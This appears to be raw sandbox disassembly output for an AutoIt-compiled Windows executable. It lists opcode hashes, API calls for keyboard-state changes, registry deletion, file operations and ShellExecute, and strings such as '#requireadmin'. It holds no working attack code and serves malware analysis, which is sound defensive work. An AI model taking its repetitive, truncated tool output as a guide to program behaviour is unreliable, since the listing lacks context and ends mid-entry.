                                                                                                                        • Opcode ID: 6497fed440c8526b19dcb4381e9dde321163920fd4759d020edbe51589e1ced7
                                                                                                                        • Instruction ID: 4dc7bc720e3aa9d5f3deff78776e201b5bce5c694db855eef8851fc4d8de6be9
                                                                                                                        • Opcode Fuzzy Hash: 6497fed440c8526b19dcb4381e9dde321163920fd4759d020edbe51589e1ced7
                                                                                                                        • Instruction Fuzzy Hash: 19317C72205614BFEB118F51CC8AFEA3BADEF49765F098055FE08EA191CBB59841CB70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                          • Part of subcall function 00D93BCF: _wcscpy.LIBCMT ref: 00D93BF2
                                                                                                                        • _wcstok.LIBCMT ref: 00DE1D6E
                                                                                                                        • _wcscpy.LIBCMT ref: 00DE1DFD
                                                                                                                        • _memset.LIBCMT ref: 00DE1E30
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                        • String ID: X$t:
                                                                                                                        • API String ID: 774024439-4137454495
                                                                                                                        • Opcode ID: 014e4b9ce0f6b1e608f6615ce44660f6a0e8bcf8e9f765f64dac633f3f7713e8
                                                                                                                        • Instruction ID: b1a38c0eb7c06dd0081e21d7409af4e2af686b7fff385079e5a6e845ed592c44
                                                                                                                        • Opcode Fuzzy Hash: 014e4b9ce0f6b1e608f6615ce44660f6a0e8bcf8e9f765f64dac633f3f7713e8
                                                                                                                        • Instruction Fuzzy Hash: 86C163756083419FCB14EF24C891A9AB7E4FF85710F04492DF89A972A2DB70ED05CBB2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b0afb97ef9940c85831ad799eb4c14da382c550b963fcb5806fa2f0f3f58724
                                                                                                                        • Instruction ID: cb5f46904eb0c64017d7e3ff87f75cee241e63fda1dd071206ff219e3bab5c93
                                                                                                                        • Opcode Fuzzy Hash: 1b0afb97ef9940c85831ad799eb4c14da382c550b963fcb5806fa2f0f3f58724
                                                                                                                        • Instruction Fuzzy Hash: 67714C71900109EFCB14CF98CC44ABEBB75FF8A328F14815AF955A6292C774DA52CB70
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DF214B
                                                                                                                        • _memset.LIBCMT ref: 00DF2214
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00DF2259
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                          • Part of subcall function 00D93BCF: _wcscpy.LIBCMT ref: 00D93BF2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00DF2320
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00DF232F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4082843840-2766056989
                                                                                                                        • Opcode ID: b5f48029bd468c90b9582ab03737c91f1812b8844da471b51cb67912e158cd59
                                                                                                                        • Instruction ID: f769832d9f69a3f0bf38b0c03b3400c989a36351a81a1396841615c545d25d7a
                                                                                                                        • Opcode Fuzzy Hash: b5f48029bd468c90b9582ab03737c91f1812b8844da471b51cb67912e158cd59
                                                                                                                        • Instruction Fuzzy Hash: 8E717A75A00619DFCF04EFA8C8819AEBBF5FF49310B158459E956AB351DB34AE40CBB0
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00DD481D
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00DD4832
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00DD4893
                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DD48C1
                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DD48E0
                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DD4926
                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DD4949
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 5cf959b05a3ed19d1888a501e61ade4fd3d7eecaef907f1df668b06613fdfa32
                                                                                                                        • Instruction ID: 34ca43a8648b017c15715b120ff524c2a58af9ab1d776931ceb819c96248b6e5
                                                                                                                        • Opcode Fuzzy Hash: 5cf959b05a3ed19d1888a501e61ade4fd3d7eecaef907f1df668b06613fdfa32
                                                                                                                        • Instruction Fuzzy Hash: 3451C3A05087D13EFB364625CC55BBBBEA95F06304F0C858EE1D556AC2C6E4E888EB70
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(00000000), ref: 00DD4638
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00DD464D
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00DD46AE
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DD46DA
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DD46F7
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DD473B
                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DD475C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: ee5c20845251e05ec07873df7c85c34891f60a31ad90aec57f86ded27f3ca636
                                                                                                                        • Instruction ID: d9752661a124ca59403054a5e94545172c5ab169dc51c67e310440d799b6eb8e
                                                                                                                        • Opcode Fuzzy Hash: ee5c20845251e05ec07873df7c85c34891f60a31ad90aec57f86ded27f3ca636
                                                                                                                        • Instruction Fuzzy Hash: 2151D4A05047D57FFB3687248C55BBABF99AB06304F0C848AE1E556AC2D3A4EC98D770
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2945705084-0
                                                                                                                        • Opcode ID: 8c6a46d9e6d9f48513345c4e4a73dbce810c47eb7339fa2015151bfdebcfa79e
                                                                                                                        • Instruction ID: 574fc5a34bab3187420031279e0bed10fefd352db3a1208e559573e91db30b33
                                                                                                                        • Opcode Fuzzy Hash: 8c6a46d9e6d9f48513345c4e4a73dbce810c47eb7339fa2015151bfdebcfa79e
                                                                                                                        • Instruction Fuzzy Hash: 2B414D6AC10214B5CB11EBB8C887ADEB7BCEF05710F908866E556F3221EA30E65587B5
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00DF3C92
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DF3CBC
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00DF3D71
                                                                                                                          • Part of subcall function 00DF3C63: RegCloseKey.ADVAPI32(?), ref: 00DF3CD9
                                                                                                                          • Part of subcall function 00DF3C63: FreeLibrary.KERNEL32(?), ref: 00DF3D2B
                                                                                                                          • Part of subcall function 00DF3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DF3D4E
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DF3D16
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 395352322-0
                                                                                                                        • Opcode ID: 469c422d03b1601f7901a60f2a0e331d193e3ac1f76ceb8cc167a1f83aac3420
                                                                                                                        • Instruction ID: 15be9b312f423da9ab21efa8116bb6dba2b03fafdfa27b34b0c8aa5a53b73114
                                                                                                                        • Opcode Fuzzy Hash: 469c422d03b1601f7901a60f2a0e331d193e3ac1f76ceb8cc167a1f83aac3420
                                                                                                                        • Instruction Fuzzy Hash: 8831097190121DBFDB14DF95DC89AFEB7BDEF08300F05816AE612A2150D6709F899B70
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DF8DF4
                                                                                                                        • GetWindowLongW.USER32(013A9458,000000F0), ref: 00DF8E27
                                                                                                                        • GetWindowLongW.USER32(013A9458,000000F0), ref: 00DF8E5C
                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DF8E8E
                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DF8EB8
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00DF8EC9
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DF8EE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2178440468-0
                                                                                                                        • Opcode ID: bf5e90e42dfe72e84addadba6647e6f215fca2740d7fc5faad112a8fc53248e7
                                                                                                                        • Instruction ID: 4ce59fbf0a3b43a9b025ae1725414d619208dd911b74b82caa1499e5ce8bcaca
                                                                                                                        • Opcode Fuzzy Hash: bf5e90e42dfe72e84addadba6647e6f215fca2740d7fc5faad112a8fc53248e7
                                                                                                                        • Instruction Fuzzy Hash: 81318A31604218EFDB24CF49DC84FA537E0FB4A314F0A85A4F6119B2B2CB72AC44EB52
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD1734
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD175A
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00DD175D
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00DD177B
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00DD1784
                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD17A9
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00DD17B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 9db3d84d7d6c6f441795484055b8c66bdf9d76e7f34345c02dc4fb12442940c6
                                                                                                                        • Instruction ID: 079adb4f462087c7e88c81868f156fcad40f5a0a98088a7dc1c8bdc947f31391
                                                                                                                        • Opcode Fuzzy Hash: 9db3d84d7d6c6f441795484055b8c66bdf9d76e7f34345c02dc4fb12442940c6
                                                                                                                        • Instruction Fuzzy Hash: 55215179604219BF9B109FA9DC88DEF77ECEB09360B448126F915DB260D674EC458770
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00DD6A2B
                                                                                                                        • _wcscmp.LIBCMT ref: 00DD6A49
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00DD6A62
                                                                                                                          • Part of subcall function 00DD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DD6DBA
                                                                                                                          • Part of subcall function 00DD6D6D: GetLastError.KERNEL32 ref: 00DD6DC5
                                                                                                                          • Part of subcall function 00DD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD6DD9
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6AA4
                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00DD6B0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2323102230-1173974218
                                                                                                                        • Opcode ID: fcb7ace0975c44c8fa328deb505493ccd587c8d269171ba13920f17cbd49839b
                                                                                                                        • Instruction ID: ea15afd1f8ec2179a5dff69a38bd68367e0551a9b31a4d636264ff84a0f926a5
                                                                                                                        • Opcode Fuzzy Hash: fcb7ace0975c44c8fa328deb505493ccd587c8d269171ba13920f17cbd49839b
                                                                                                                        • Instruction Fuzzy Hash: 09311271800218AACF50EFA4E845ADDB7B8AF08300F5455EBE545F3251EB34DB89CBB4
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                        • Opcode ID: 4d669c8482c5a4f8263b381325e51529765f802a5cf0ed35b1c611c6520d7020
                                                                                                                        • Instruction ID: 5ac91406707b7ba7fa40c5648170aba7165512aaf95b654eed8eb61a996c9b9d
                                                                                                                        • Opcode Fuzzy Hash: 4d669c8482c5a4f8263b381325e51529765f802a5cf0ed35b1c611c6520d7020
                                                                                                                        • Instruction Fuzzy Hash: CA212972108621B6D231EB359C02FF7B3E8DF65350F184427F58697295EB919A82C2B2
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD180D
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD1833
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00DD1836
                                                                                                                        • SysAllocString.OLEAUT32 ref: 00DD1857
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00DD1860
                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD187A
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00DD1888
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 20fe101839f3c5537ba1a63447f09b69da878af9a8a665492381b742cb5e647b
                                                                                                                        • Instruction ID: 3bb36a494c7aee0b45d29bb8812c0ea40c2018f1a42f67a42e737d5e06b0088a
                                                                                                                        • Opcode Fuzzy Hash: 20fe101839f3c5537ba1a63447f09b69da878af9a8a665492381b742cb5e647b
                                                                                                                        • Instruction Fuzzy Hash: 56216079604204BFDB10DFE9DC88DAE77ECEB09360B448126F915DB2A0DA74EC419B70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
                                                                                                                          • Part of subcall function 00DAC619: GetStockObject.GDI32(00000011), ref: 00DAC66B
                                                                                                                          • Part of subcall function 00DAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DFA13B
                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DFA148
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DFA153
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DFA162
                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DFA16E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
